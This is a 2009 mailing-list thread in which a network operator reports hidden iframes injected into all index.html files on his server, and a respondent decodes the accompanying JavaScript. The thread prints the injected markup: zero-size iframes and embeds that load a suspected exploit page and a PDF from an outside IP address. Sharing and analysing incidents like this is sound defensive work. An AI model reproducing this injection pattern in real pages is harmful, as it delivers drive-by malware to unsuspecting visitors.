I took a quick look at the code... formatted it in a pastebin here:
http://pastebin.com/m7b50be54

That javascript writes this to the page (URL obscured):
document.write("<embed
src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\"
width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");

The 1.2.3.4 in the URL is my public IP address (I changed that).

Below the javascript, it grabs a PDF:
<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>

That PDF is on the site, I haven't looked at it yet though.

-ChrisAM
http://securabit.com

On Fri, Apr 17, 2009 at 4:42 PM, Russell Berg <b...@wins.net> wrote:
> FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com
>
> -----Original Message-----
> From: Russell Berg
> Sent: Friday, April 17, 2009 3:39 PM
> To: 'nanog@nanog.org'
> Subject: Malicious code just found on web server
>
> We just discovered what we suspect is malicious code appended to all 
> index.html files on our web server as of the 11:00 central time hour today:
>
> src="http://77.92.158.122/webmail/inc/web/index.php";
> style="display: none;" height="0" width="0"></iframe> <iframe 
> src="http://77.92.158.122/webmail/inc/web/index.php";
> style="display: none;" height="0" width="0"></iframe> </body> </html>
>
> IP address resolves to mail.yaris.com; couldn't find any A/V site references 
> to this.
>
> Google search reveals some Chinese sites with references to the URL today, 
> but nothing substantial in the translation.
>
> Just a heads up for folks; we have a team investigating...
>
> Russell Berg
> Dir - Product Development
> Airstream Communications
> b...@wins.net
> 715-832-3726
>
>
>
>

Reply via email to